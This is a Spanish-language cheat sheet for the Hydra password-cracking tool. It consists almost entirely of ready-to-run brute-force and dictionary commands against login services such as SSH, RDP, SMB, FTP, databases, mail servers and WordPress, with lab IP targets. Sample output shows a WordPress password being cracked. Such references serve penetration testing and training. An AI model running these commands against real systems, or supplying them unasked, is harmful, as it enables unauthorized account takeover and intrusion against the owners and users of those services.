5 minuto(s) estimado(s) de lectura
Hydra
Herramienta para romper contraseñas
Es una herramienta para romper inicios de sesión a través de ataques de fuerza bruta o de diccionario.
Admite: Cisco AAA, Cisco auth, Cisco enable, CVS, FTP, HTTP(S)-FORM-GET, HTTP(S)-FORM-POST, HTTP(S)-GET, HTTP(S)-HEAD, HTTP- Proxy, ICQ, IMAP, IRC, LDAP, MS-SQL, MySQL, NNTP, Oracle Listener, Oracle SID, PC-Anywhere, PC-NFS, POP3, PostgreSQL, RDP, Rexec, Rlogin, Rsh, SIP, SMB(NT) , SMTP, SMTP Enum, SNMP v1+v2+v3, SOCKS5, SSH (v1 y v2), SSHKEY, Subversion, Teamspeak (TS2), Telnet, VMware-Auth, VNC y XMPP.
Tabla de parámetros
| Parámetro | Utilidad |
|---|---|
| -P | Indica la ruta del diccionario de contraseñas. |
| -L | Indica la ruta del diccionario de usuarios. |
| -t | Hilos (1-64). |
| -s | Se selecciona el puerto del servicio en el caso de que no sea por defecto. |
| -f | Salir cuando se encuentren las credenciales de inicio de sesión/contraseña. |
| -vV | Verbose. |
CouchDB
┌─[root@kali]─[/hydra]
└──╼ hydra -L /usr/share/wordlists/simple-users.txt -P /usr/share/wordlists/password.lst localhost -s 5984 http-get /
Docker Registry
┌─[root@kali]─[/hydra]
└──╼ hydra -L /usr/share/wordlists/simple-users.txt -P /usr/share/wordlists/password.lst 10.1.1.30 -s 5000 https-get /v2/
Elasticsearch
┌─[root@kali]─[/hydra]
└──╼ hydra -L /usr/share/wordlists/simple-users.txt -P /usr/share/wordlists/password.lst localhost -s 9200 http-get /
FTP
┌─[root@kali]─[/hydra]
└──╼ hydra -l root -P passwords.txt -t 32 10.1.1.30 ftp
HTTP-GET
┌─[root@kali]─[/hydra]
└──╼ hydra -L username.txt -P /usr/share/wordlists/rockyou.txt 10.1.1.30 http-get /admin
Para el caso de https, se debe reemplazar http-post por https-get.
HTTP-POST
┌─[root@kali]─[/hydra]
└──╼ hydra -L users.txt -P password.lst 10.1.1.30 http-post-form "/path/index.php:name=^USER^&password=^PASS^&enter=Sign+in:Login name or password is incorrect" -V
Para el caso de https, se debe reemplazar http-post-form por https-post-form.
IMAP
┌─[root@kali]─[/hydra]
└──╼ hydra -l USERNAME -P /path/to/passwords.txt -f 10.1.1.30 imap -V
┌─[root@kali]─[/hydra]
└──╼ hydra -S -v -l USERNAME -P /path/to/passwords.txt -s 993 -f 10.1.1.30 imap -V
LDAP
┌─[root@kali]─[/hydra]
└──╼ hydra -L users.txt -P passwords.txt 10.1.1.30 ldap2 -V -f
MySQL
┌─[root@kali]─[/hydra]
└──╼ hydra -L usernames.txt -P pass.txt 10.1.1.30 mysql
POP3
┌─[root@kali]─[/hydra]
└──╼ hydra -l USERNAME -P /usr/share/wordlistsnmap.lst -f 10.1.1.30 pop3 -V
PostgreSQL
┌─[root@kali]─[/hydra]
└──╼ hydra -L users.txt –P passwords.txt 10.1.1.30 postgres
RDP
┌─[root@kali]─[/hydra]
└──╼ hydra -t 1 -V -f -l administrator -P /usr/share/wordlists/rockyou.txt rdp://10.1.1.30
┌─[root@kali]─[/hydra]
└──╼ hydra -t 1 -V -f -L users.txt -P /usr/share/wordlists/rockyou.txt rdp://10.1.1.30
Redis
┌─[root@kali]─[/hydra]
└──╼ hydra –P passwords.txt redis://10.1.1.30:6379
Rexec
┌─[root@kali]─[/hydra]
└──╼ hydra -l user -P passwords.txt rexec://10.1.1.30 -v -V
Rlogin
┌─[root@kali]─[/hydra]
└──╼ hydra -l user -P passwords.txt rlogin://10.1.1.30 -v -V
Rsh
┌─[root@kali]─[/hydra]
└──╼ hydra -L user.txt rsh://10.1.1.30 -v -V
RTSP
┌─[root@kali]─[/hydra]
└──╼ hydra -l root -P passwords.txt 10.1.1.30 rtsp
SMB
┌─[root@kali]─[/hydra]
└──╼ hydra -t 1 -V -f -l administrator -P /usr/share/wordlists/rockyou.txt 10.1.1.30 smb
┌─[root@kali]─[/hydra]
└──╼ hydra -t 1 -V -f -L users.txt -P /usr/share/wordlists/rockyou.txt 10.1.1.30 smb
SMTP
┌─[root@kali]─[/hydra]
└──╼ hydra -P /usr/share/wordlists/wordlistsnmap.lst 10.1.1.30 smtp -V
SNMP
┌─[root@kali]─[/hydra]
└──╼ hydra -P wordlist.txt -v 10.1.1.30 snmp
SQL Server
┌─[root@kali]─[/hydra]
└──╼ hydra -L user.txt –P passwords.txt 10.1.1.30 mssql
SSH
┌─[root@kali]─[/hydra]
└──╼ hydra -vV -L users.txt -P passwords.txt -t 1 -u 10.1.1.30 ssh
Al conocer el usuario:
┌─[root@kali]─[/hydra]
└──╼ hydra -vV -l user -P passwords.txt -t 1 10.1.1.30 ssh
Al conocer la contraseña:
┌─[root@kali]─[/hydra]
└──╼ hydra -vV -L users.txt -p password -t 1 -u 10.1.1.30 ssh
Telnet
┌─[root@kali]─[/hydra]
└──╼ hydra -l root -P passwords.txt -t 32 10.1.1.30 telnet
VNC
┌─[root@kali]─[/hydra]
└──╼ hydra -L users.txt –P passwords.txt -s 5432 10.1.1.30 vnc
Nota
Para eliminar elementos repetidos de un diccionario se debe realizar lo siguiente:
┌─[root@kali]─[/hydra]
└──╼ cat wordlist.dic | sort | uniq > new_wordlist.txt
Ejemplo en Wordpress
┌─[root@kali]─[/hydra]
└──╼ hydra -L users.txt -P passwords.txt 10.1.1.30 -V http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location' -t 64
...
...
...
[ATTEMPT] target 10.1.1.30 - login "elliot" - pass "examples" - 5686 of 11452 [child 35] (0/0)
[ATTEMPT] target 10.1.1.30 - login "elliot" - pass "Examples" - 5687 of 11452 [child 50] (0/0)
[ATTEMPT] target 10.1.1.30 - login "elliot" - pass "exams" - 5688 of 11452 [child 8] (0/0)
[ATTEMPT] target 10.1.1.30 - login "elliot" - pass "excellent" - 5689 of 11452 [child 29] (0/0)
[80][http-post-form] host: 10.1.1.30 login: elliot password: ER28-0652
1 of 1 target successfully completed, 1 valid password found
Ejemplo desde Windows
Hydra.exe se extrae desde el respositorio de GitHub de THC-Hydra.
D:\Hydra>hydra.exe -v -V -t 64 -L users.txt -P rockyou.txt test.com https-form-post "/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location"
